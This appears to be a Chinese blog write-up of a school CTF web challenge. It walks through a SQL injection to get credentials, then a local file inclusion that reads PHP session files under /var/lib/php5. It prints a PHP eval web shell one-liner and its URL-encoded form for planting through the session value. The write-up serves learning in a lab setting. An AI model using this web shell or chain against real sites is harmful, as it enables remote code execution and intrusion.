当前位置:网站首页>小学期,第三场-下午:WEB_sessionlfi
小学期,第三场-下午:WEB_sessionlfi
2022-06-30 19:06:00 【Part 02】
扫出
login.php
table.php
login.php 源码有提示 table.php?id
table.php 有注入报错
如果没有提示也可以 fuzz 出
通过简单 sql 注入得到 账号-密码
进入 home.php
可以读文件
读不了 /flag.txt
抓包
user_pref 的值为我们输入的值,有漏洞
php 5.4.6服务端生成的session id
例如:
sess_00nrqa20hjrlaiac0eu726i4q5
sess_89j9ifuqrbplk0rti2va2k1ha0
sess_g2rv1kd6ijsj6g6c9jq5mqglv5
响应包可以看到服务器用 ubuntu
Ubuntu 默认 session 会话:
php5 sessions in /var/lib/php5
确实可以访问到
把小马 URL 全字符编码
<?php eval($_GET[1]);?>
%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e
%20 为空格,连接 /
执行成功,接下来读取就行
边栏推荐
猜你喜欢
4.3寸触控屏12路控制端口可编程网络中控支持5台中控主机相互备份
码蹄集 - MT3435 · 赋值 - 二分图问题 - 图文讲解
JVM FAQs
解决arm_release_ver of this libmali is ‘g2p0-01eac0‘,rk_so_ver is ‘4‘,libgl1-mesa-dev不会被安装,存在未满足的依赖关系
项目配置了eslint,编辑器没有关闭eslint功能的情况下,eslint没有生效
2022年高考都结束了,还有人真觉得程序员下班后不需要学习吗?
为什么数字化转型战略必须包括持续测试?
The project is configured with eslint. When the editor does not close the eslint function, the eslint does not take effect
派尔特医疗在港交所招股书二次“失效”,上市计划实质性延迟
ArcGIS no plug-in load (no offset) day map
随机推荐
微信小程序快速入门 --项目介绍
IT外包驻场人员怎么定位自己的痛点?
Temperature measuring instrument based on STM32 single chip microcomputer
Makefile笔记(一文学会Makefile)
c语言数组截取,C# 字符串按数组截取方法(C/S)
MySQL数据库查询优化
Redis入门到精通01
事件队列、微任务与宏任务的理解和面试题
Go language learning tutorial (10)
在广州的朋友,有机会可以参加下
How does an in memory database take advantage of memory?
Small notes - integer improvement (C language)
【已解决】抖音如何取消关注已注销的账户
【多线程】使用线程池、实现一个简单线程池
This morning, investors began to travel collectively
DNS服务器搭建、转发、主从配置
Advanced skills of testers: a guide to the application of unit test reports
请指教在线开户是什么意思?究竟网上开户是否安全么?
假期安全不放假,VR交通让孩子安全出行|广州华锐视点
ArcGIS no plug-in load (no offset) day map